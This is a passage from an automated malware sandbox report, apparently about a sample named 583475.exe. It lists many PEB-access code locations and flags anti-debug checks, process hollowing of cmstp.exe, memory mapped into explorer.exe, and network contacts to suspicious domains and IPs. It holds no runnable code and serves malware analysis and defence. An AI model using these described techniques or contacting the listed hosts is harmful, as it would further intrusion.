          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EBA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E78EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EC4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E68E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E41B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E48794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E63B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\583475.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.appsdeals14.com
          Source: C:\Windows\explorer.exeDomain query: www.tinyhollywood.com
          Source: C:\Windows\explorer.exeNetwork Connect: 68.66.224.28 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 9D0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\583475.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
